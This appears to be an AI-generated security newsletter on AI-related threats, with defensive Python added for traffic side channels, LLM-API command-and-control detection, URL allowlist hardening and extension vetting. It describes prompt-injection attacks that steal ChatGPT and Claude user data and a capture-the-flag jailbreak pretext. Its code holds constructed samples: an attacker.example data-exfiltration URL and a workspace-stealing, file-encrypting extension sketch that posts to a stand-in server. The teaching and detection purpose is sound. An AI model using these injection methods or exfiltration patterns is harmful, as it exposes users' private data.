Cyber AI Chronicle
By Simon Ganiere · 9th November 2025
Welcome Back!
Even the strongest encryption isn't enough to keep AI conversations private, as Microsoft researchers have demonstrated with a new attack that can determine chat topics by analyzing network traffic patterns alone. The 'Whisper Leak' technique achieves near-perfect accuracy in classifying sensitive discussions, prompting immediate response from major AI providers.
This discovery reveals a fundamental blind spot in AI security—while we focus on protecting the content of communications, the metadata itself can betray our most private interactions. As AI becomes more integrated into sensitive workflows, how do we defend against threats that don't need to break encryption to compromise privacy?
In today's AI recap:
The Encryption Blind Spot
What you need to know: Microsoft has uncovered a new side-channel attack called 'Whisper Leak' that can determine the topic of AI chat conversations, even when the traffic is fully encrypted.
Why is it relevant?:
The attack works by analyzing the "fingerprints" of the encrypted traffic, specifically packet sizes and inter-packet timing. Because chat services stream their answers token by token, the size and arrival time of each encrypted packet track the tokens inside it, and those sequences are enough to classify what a user is discussing with an LLM.
The method is highly effective: the research reports near-perfect classification (over 98% AUPRC) and can still pick out a sensitive topic with high precision when the target conversation is buried in a large volume of unrelated traffic.
In response, major AI providers including OpenAI, Mistral, and Microsoft have already deployed mitigations, such as adding random padding to chatbot responses to obscure these traffic patterns.
Bottom line: This discovery highlights that even with strong encryption, metadata leakage from AI services is a significant privacy risk. Securing these side-channels is becoming a critical new frontier for cybersecurity professionals as AI integration deepens.
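To make the side channel concrete, here is an added toy model of it (not Microsoft's code or data). Two constructed streamed replies are serialised one chunk per TLS record; an on-path observer sees only record sizes, yet recovers the token lengths exactly and matches the trace to a topic fingerprint. The padding mitigation is modelled by appending a random-length filler field to every streamed event. The TLS overhead constant, the JSON envelope and the `obfuscation` field name are assumptions made for the example:

```python
import json
import random
from statistics import mean

# Constructed sample replies, one per topic, split into the chunks a streaming chat API
# would emit (roughly one token each). Illustrative strings, not real model output.
SAMPLES = {
    "money laundering": ["Money", " laundering", " typically", " involves", " three",
                         " stages", ":", " placement", ",", " layering"],
    "sourdough": ["Sour", "dough", " needs", " a", " lively", " starter", " and",
                  " long", " fermentation", "."],
}

# Assumed constants: per-record TLS overhead and the fixed JSON envelope around a chunk.
TLS_OVERHEAD = 29                    # TLS 1.3 header + content-type byte + AEAD tag
ENVELOPE = len(b'{"delta":""}')      # 12 bytes of JSON around every chunk


def event_bytes(token, filler=None):
    """One streamed event. filler=None mirrors an unpadded stream; a filler string
    mirrors the random-padding mitigation (the field name is assumed)."""
    event = {"delta": token}
    if filler is not None:
        event["obfuscation"] = filler
    return json.dumps(event, separators=(",", ":")).encode("utf-8")


def wire_sizes(chunks, rng=None, max_pad=32):
    """Record sizes an on-path observer sees: content is encrypted, length is not."""
    sizes = []
    for chunk in chunks:
        filler = None if rng is None else "x" * rng.randint(1, max_pad)
        sizes.append(len(event_bytes(chunk, filler)) + TLS_OVERHEAD)
    return sizes


def padded_trace(chunks, seed=7):
    """The same stream with padding switched on, seeded so the demo is repeatable."""
    return wire_sizes(chunks, rng=random.Random(seed))


def recover_token_lengths(sizes):
    """What the observer infers from an unpadded stream: exact token byte lengths."""
    return [s - TLS_OVERHEAD - ENVELOPE for s in sizes]


def distance(a, b):
    """Mean absolute size difference per position; the shorter trace is zero-padded."""
    n = max(len(a), len(b))
    a, b = a + [0] * (n - len(a)), b + [0] * (n - len(b))
    return mean(abs(x - y) for x, y in zip(a, b))


def classify(observed, fingerprints):
    """Nearest-fingerprint classifier on sizes alone; a stand-in for the paper's models."""
    return min(fingerprints, key=lambda topic: distance(observed, fingerprints[topic]))


FINGERPRINTS = {topic: wire_sizes(chunks) for topic, chunks in SAMPLES.items()}

if __name__ == "__main__":
    plain = wire_sizes(SAMPLES["sourdough"])
    print("observed sizes:", plain)
    print("recovered token lengths:", recover_token_lengths(plain))
    print("classified as:", classify(plain, FINGERPRINTS))
    padded = padded_trace(SAMPLES["sourdough"])
    print("padded sizes:", padded, "->", classify(padded, FINGERPRINTS))
```

Two caveats a practitioner should keep in mind. Bounded random padding stops exact length recovery, but a classifier trained on padded traces can still exploit the fact that the padding only ever adds a bounded positive offset, so padding reduces rather than removes the signal. It also does nothing about inter-packet timing, which is the other half of the fingerprint; mitigations that batch several tokens into one record change the timing side as well.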
Malware Gets a Brain
What you need to know: Google's Threat Intelligence Group (GTIG) reports a major evolution in cyber threats, with state-sponsored actors deploying malware that calls a generative AI model during execution to rewrite its own code and generate commands on the fly.
Why is it relevant?:
A new experimental malware, PROMPTFLUX, uses Gemini's API to rewrite its own source code hourly, a technique designed to evade static detection by constantly changing the code that signature-based tools would match.
For the first time in live operations, Russia's APT28 has deployed malware called PROMPTSTEAL that queries an LLM to dynamically generate data-stealing commands, making the attack's behaviour less predictable.
Attackers are also using social-engineering prompts, such as claiming to be taking part in a capture-the-flag competition, to talk AI models past their safeguards and obtain help with system exploitation.
Bottom line: This shift from using AI for productivity to embedding it in malware's core logic presents a new challenge for traditional, signature-based security tools. Defenders must now anticipate threats that can think and adapt in real-time, accelerating the need for AI-driven detection and response capabilities.
Hiding in Plain Sight
What you need to know: Microsoft discovered a new backdoor, dubbed 'SesameOp,' that cleverly uses OpenAI's legitimate Assistants API as a covert command-and-control channel to evade detection.
Why is it relevant?:
Instead of using its own servers, the malware fetches encrypted commands and sends back stolen data through the API, making its traffic look like legitimate AI activity.
The attack chain involves a heavily obfuscated loader that deploys the backdoor using a .NET AppDomainManager injection into Microsoft Visual Studio utilities.
The attack misuses a built-in feature of the Assistants API rather than a vulnerability; OpenAI had already scheduled that API for deprecation in August 2026.
Bottom line: This attack highlights a growing trend of threat actors using trusted cloud services as camouflage for their malicious operations. For security teams, the challenge shifts from simply blocking bad domains to distinguishing malicious API calls from legitimate ones.
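Both of the stories above, the PROMPTFLUX/PROMPTSTEAL malware calling model APIs from inside the implant and SesameOp polling the Assistants API for tasking, leave the same kind of trace: a process that should not be talking to an LLM API doing so on a timer and occasionally pushing a lot of data out. The script below is an added example (not Microsoft's or Google's detection content) of three cheap rules over egress proxy logs. The log lines, host names, process names and thread path are constructed; the API host list and the set of sanctioned processes are assumptions you would replace with your own:

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, median, pstdev

# Assumed: LLM API hosts worth watching. PROMPTFLUX talked to the Gemini API and SesameOp
# to the OpenAI Assistants API, per the reports above; the Hugging Face host is an extra.
LLM_API_HOSTS = {
    "generativelanguage.googleapis.com": "Gemini API",
    "api.openai.com": "OpenAI API",
    "api-inference.huggingface.co": "Hugging Face Inference API",
}
# Assumed: the only processes this organisation expects to call those hosts directly.
SANCTIONED_PROCESSES = {"chrome.exe", "msedge.exe", "Code.exe"}

# Constructed proxy log (not real telemetry): ts|src_host|process|dest_host|path|bytes_out
PROXY_LOG = """\
2025-11-05T09:00:00|WS-117|msedge.exe|api.openai.com|/v1/chat/completions|2310
2025-11-05T09:00:02|WS-117|msedge.exe|www.example.com|/|640
2025-11-05T09:05:00|WS-042|buildhelper.exe|api.openai.com|/v1/threads/thr_constructed/messages|512
2025-11-05T09:10:00|WS-042|buildhelper.exe|api.openai.com|/v1/threads/thr_constructed/messages|498
2025-11-05T09:15:00|WS-042|buildhelper.exe|api.openai.com|/v1/threads/thr_constructed/messages|530
2025-11-05T09:20:00|WS-042|buildhelper.exe|api.openai.com|/v1/threads/thr_constructed/messages|501
2025-11-05T09:25:01|WS-042|buildhelper.exe|api.openai.com|/v1/threads/thr_constructed/messages|7900
2025-11-05T09:30:00|WS-042|buildhelper.exe|api.openai.com|/v1/threads/thr_constructed/messages|505
2025-11-05T09:31:14|WS-203|Code.exe|generativelanguage.googleapis.com|/v1beta/models/gemini-x:generateContent|1800
2025-11-05T10:00:00|WS-203|Code.exe|generativelanguage.googleapis.com|/v1beta/models/gemini-x:generateContent|1750
"""


def parse_log(text):
    rows = []
    for line in text.splitlines():
        ts, src, proc, dest, path, out = line.split("|")
        rows.append({"ts": datetime.fromisoformat(ts), "src": src, "proc": proc,
                     "dest": dest, "path": path, "bytes_out": int(out)})
    return rows


def _by_caller(rows):
    """Group LLM-API requests by (source host, process, API host)."""
    groups = defaultdict(list)
    for r in rows:
        if r["dest"] in LLM_API_HOSTS:
            groups[(r["src"], r["proc"], r["dest"])].append(r)
    return groups


def analyse(text, min_hits=4, max_cv=0.1, spike_factor=5.0):
    """Three cheap rules that separate a C2 loop from a person using an assistant."""
    findings = {"unsanctioned-process": [], "periodic-polling": [], "outbound-spike": []}
    for (src, proc, dest), reqs in _by_caller(parse_log(text)).items():
        api = LLM_API_HOSTS[dest]
        # Rule 1: a process with no business talking to an LLM API.
        if proc not in SANCTIONED_PROCESSES:
            findings["unsanctioned-process"].append({"src": src, "proc": proc, "api": api})
        if len(reqs) < min_hits:
            continue
        stamps = sorted(r["ts"] for r in reqs)
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # Rule 2: near-constant gaps are a poll loop (an implant checking in on a timer,
        # or rewriting itself every hour), not a human typing prompts.
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_cv:
            findings["periodic-polling"].append(
                {"src": src, "proc": proc, "api": api,
                 "period_s": round(mean(gaps)), "hits": len(stamps)})
        # Rule 3: one request far above the caller's own median is data leaving, not a prompt.
        baseline = median(r["bytes_out"] for r in reqs)
        for r in reqs:
            if r["bytes_out"] > spike_factor * baseline:
                findings["outbound-spike"].append(
                    {"src": src, "proc": proc, "api": api,
                     "path": r["path"], "bytes_out": r["bytes_out"]})
    return findings


if __name__ == "__main__":
    for rule, hits in analyse(PROXY_LOG).items():
        print(rule, hits)
```

On the constructed log the browser session on WS-117 is left alone, while the unsanctioned process on WS-042 trips all three rules: it is not on the list, it checks in every 300 seconds, and one of its requests is an order of magnitude larger than the rest. In practice the allowlist is the fragile part: an implant injected into a sanctioned process (SesameOp rode in Visual Studio utilities) passes rule 1, which is why the timing and volume rules are worth keeping alongside it.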
ChatGPT's Leaky Memory
What you need to know: Tenable has disclosed seven vulnerabilities and attack techniques in ChatGPT that allow attackers to steal private data from user memories and chat histories. The attacks exploit the AI's web browsing and memory features through indirect prompt injections.
Why is it relevant?:
Not every attack needs the user to do anything unusual: one zero-click vector is triggered simply by asking ChatGPT a question whose answer leads it to a malicious, indexed website.
Attackers can chain exploits, such as bypassing safety checks with allow-listed Bing URLs and using a 'Conversation Injection' technique to make ChatGPT poison its own chat context.
One of the most concerning techniques is 'memory injection,' which can permanently alter a user's ChatGPT memory to exfiltrate data across all future conversations, creating a persistent threat.
Bottom line: This research shows that as AI models gain more capabilities like web browsing and memory, their attack surface expands in unpredictable ways. Securing these external data integrations is a critical challenge for AI developers and a key risk for security teams to monitor.
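The allow-listed Bing URL bypass above is an instance of a general mistake: applying a host allowlist to a link without looking at what the link carries. The code below is an added illustration (not OpenAI's or Tenable's code) of a naive host-only check beside a hardened one that also runs the allowlist over any URL hidden in the query string, whether percent-encoded, double-encoded or base64. The allowlist, the `/ck/a` path and the `u=` parameter are assumed shapes for a trusted host's click-tracking redirector, and the attacker target is constructed:

```python
import base64
import binascii
from urllib.parse import parse_qsl, quote, unquote, urlparse

# Assumed allowlist shape: hosts the link-rendering layer trusts unconditionally.
ALLOWED_HOSTS = {"www.bing.com", "bing.com"}


def _decodings(value):
    """Every form in which a query value might carry a URL: as-is, percent-decoded once
    more (double encoding), and base64/base64url-decoded."""
    forms = {value, unquote(value)}
    padded = value + "=" * (-len(value) % 4)
    for decoder in (base64.urlsafe_b64decode, base64.b64decode):
        try:
            forms.add(decoder(padded).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError, ValueError):
            pass
    return forms


def embedded_urls(url):
    """Absolute URLs smuggled inside the query string of `url`."""
    found = []
    for _, value in parse_qsl(urlparse(url).query, keep_blank_values=True):
        for form in _decodings(value):
            for scheme in ("https://", "http://"):
                i = form.find(scheme)
                if i != -1:
                    found.append(form[i:].split()[0])
    return found


def is_safe_url_naive(url):
    """Host-only allowlist: anything on a trusted host passes, redirectors included."""
    return urlparse(url).hostname in ALLOWED_HOSTS


def is_safe_url_hardened(url):
    """Apply the allowlist to the outer host and to every URL found inside the query,
    so a trusted host cannot serve as a wrapper for an untrusted one."""
    if urlparse(url).hostname not in ALLOWED_HOSTS:
        return False
    return all(urlparse(inner).hostname in ALLOWED_HOSTS for inner in embedded_urls(url))


def build_wrapper_urls(target):
    """Constructed attacker wrappers: a trusted host's click-tracking style path (path
    and parameter name assumed) carrying `target` three ways."""
    enc = quote(target, safe="")
    b64 = base64.urlsafe_b64encode(target.encode()).decode().rstrip("=")
    return {
        "percent": f"https://www.bing.com/ck/a?u={enc}",
        "double": f"https://www.bing.com/ck/a?u={quote(enc, safe='')}",
        "base64": f"https://www.bing.com/ck/a?u={b64}",
    }


if __name__ == "__main__":
    for name, url in build_wrapper_urls("https://attacker.example/collect?mem=secret").items():
        print(name, "naive:", is_safe_url_naive(url), "hardened:", is_safe_url_hardened(url))
```

The hardened check catches the three wrappers here, but a real redirector may encode its destination in its own format, so the robust options are to resolve the redirect server-side and allowlist the final destination, or to refuse redirector endpoints outright. Note also what this check does not cover: data the model itself places into the query string of an allowed host (a search URL with memory contents in the `q=` parameter, say) is still exfiltration, so the set of allowed hosts that may carry model-chosen parameters needs to be small and deliberate.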
AI's Malicious Code Test
What you need to know: A malicious VS Code extension with ransomware capabilities, likely generated with AI, was successfully published to Microsoft's official marketplace. The incident highlights a critical gap in the security vetting process for developer tools.
Why is it relevant?:
The extension, described by researchers as 'AI slop', showed obvious signs of being AI-generated, with commented-out code and a simple structure that was functional but not refined.
It slipped through Microsoft’s review process despite a blatantly malicious description, a suspicious publisher name, and functionality that openly advertised file theft and encryption.
Upon activation, the tool would create a .ZIP archive to exfiltrate files to a command-and-control server before encrypting the local copies, testing a simple but effective extortion model.
Bottom line: This event shows how AI can lower the barrier for creating and deploying malicious code into trusted software ecosystems. It places a new urgency on platform owners to improve security checks and on developers to scrutinize their supply chains.
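The traits the report lists (activation on startup, archive-then-upload, in-place encryption, a description that says so outright, a throwaway publisher name and a pile of commented-out code) are all cheap to check before an extension is published or installed. What follows is an added example of such a pre-install triage (not Microsoft's marketplace review logic and not the real extension's code): a constructed manifest and source sketch carrying those traits, a benign counterpart, and heuristic checks that flag the former and pass the latter. The capability regexes and thresholds are assumptions to tune, and the findings are signals for a human reviewer, not verdicts:

```python
import json
import re

# Constructed manifest and source for a hypothetical extension showing the traits the
# report lists. Not the real extension's code; the source is a sketch, not runnable JS.
SUSPECT_MANIFEST = json.loads("""{
  "name": "quick-sync-helper",
  "publisher": "devtools-publisher-2281",
  "description": "Zips your workspace, uploads it to our server and encrypts local copies. Test for AI malware.",
  "activationEvents": ["*"],
  "main": "./extension.js"
}""")
SUSPECT_SOURCE = """\
const vscode = require('vscode');
const fs = require('fs');
const https = require('https');
const crypto = require('crypto');
const { execSync } = require('child_process');
// const path = require('path');
// const AdmZip = require('adm-zip');
// function oldExfil() { }
// function unusedZip() { }
// TODO: remove before release
function activate(context) {
  execSync('zip -r /tmp/out.zip ' + vscode.workspace.rootPath);
  const req = https.request({ host: 'c2.invalid', method: 'POST' });
  req.write(fs.readFileSync('/tmp/out.zip'));
  const cipher = crypto.createCipheriv('aes-256-cbc', key, iv);
  fs.writeFileSync(target, cipher.update(fs.readFileSync(target)));
}
module.exports = { activate };
"""
BENIGN_MANIFEST = {"name": "hello", "publisher": "example-dev", "description": "Says hello.",
                   "activationEvents": ["onCommand:hello.say"], "main": "./extension.js"}
BENIGN_SOURCE = """\
const vscode = require('vscode');
function activate(context) {
  context.subscriptions.push(vscode.commands.registerCommand('hello.say', () => {
    vscode.window.showInformationMessage('Hello');
  }));
}
module.exports = { activate };
"""

# Capability markers in extension JavaScript (assumed heuristics, not a parser).
CAPABILITIES = {
    "shell": re.compile(r"require\(['\"]child_process['\"]\)|\bexec(?:Sync)?\(", re.I),
    "network": re.compile(r"require\(['\"](?:https?|net|dgram)['\"]\)|\bfetch\(", re.I),
    "archive": re.compile(r"\bzip\b|adm-zip|\barchiver\b|\btar\b", re.I),
    "crypto": re.compile(r"createCipheriv|createCipher\(", re.I),
    "fswrite": re.compile(r"fs\.(?:write|writeFile|writeFileSync|rename|unlink)", re.I),
}
SELF_DESCRIBED = re.compile(
    r"exfiltrat|steal|ransom|malware|encrypt|upload\w*\s+(?:it|your|the|all)\b", re.I)


def dead_code_ratio(source):
    """Share of non-blank lines that are commented out (one 'AI slop' tell from the report)."""
    lines = [l.strip() for l in source.splitlines() if l.strip()]
    return sum(l.startswith("//") for l in lines) / max(len(lines), 1)


def vet_extension(manifest, source, dead_code_threshold=0.25):
    """Pre-publish triage a marketplace (or a cautious team) can run on an extension."""
    caps = {name for name, rx in CAPABILITIES.items() if rx.search(source)}
    findings = []
    events = manifest.get("activationEvents", [])
    if "*" in events or "onStartupFinished" in events:
        findings.append("activates-without-user-action")
    if {"archive", "network"} <= caps:
        findings.append("archive-and-upload-capability")
    if {"crypto", "fswrite"} <= caps:
        findings.append("in-place-encryption-capability")
    if "shell" in caps:
        findings.append("spawns-shell-commands")
    if SELF_DESCRIBED.search(manifest.get("description", "")):
        findings.append("self-described-malicious-behaviour")
    if re.search(r"\d{3,}$", manifest.get("publisher", "")):
        findings.append("throwaway-looking-publisher")
    if dead_code_ratio(source) >= dead_code_threshold:
        findings.append("high-dead-code-ratio")
    return findings


if __name__ == "__main__":
    print("suspect:", vet_extension(SUSPECT_MANIFEST, SUSPECT_SOURCE))
    print("benign:", vet_extension(BENIGN_MANIFEST, BENIGN_SOURCE))
```

The capability-combination rules are the ones worth keeping: a backup extension legitimately archives and uploads, and an encryption helper legitimately calls `createCipheriv`, but an extension that does both, activates on every startup and says so in its description deserves a human look before it reaches a marketplace, which is exactly the look the report says this one never got.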
The Shortlist
Researchers discovered that Anthropic's Claude AI can be tricked by indirect prompt injections into exfiltrating user data and chat memories through its own Files API.
Google used its 'Big Sleep' AI agent to discover five new security vulnerabilities in Apple's Safari WebKit, which could lead to browser crashes and memory corruption.
Keras contained a data exposure vulnerability in its preprocessing layers that allowed malicious models to read arbitrary local files or conduct SSRF attacks during the deserialization process.
Zscaler acquired AI security company SPLX to integrate its AI asset discovery, red teaming, and runtime threat inspection capabilities into the Zero Trust Exchange platform.
AI Influence Level
Level 4 - AI Created, Human Basic Idea / The whole newsletter is generated via an n8n workflow based on publicly available RSS feeds. Human-in-the-loop to review the selected articles and subjects.
Reference: AI Influence Level from Daniel Miessler
Till next time!
Project Overwatch is a cutting-edge newsletter at the intersection of cybersecurity, AI, technology, and resilience, designed to navigate the complexities of our rapidly evolving digital landscape. It delivers insightful analysis and actionable intelligence, empowering you to stay ahead in a world where staying informed is not just an option, but a necessity.
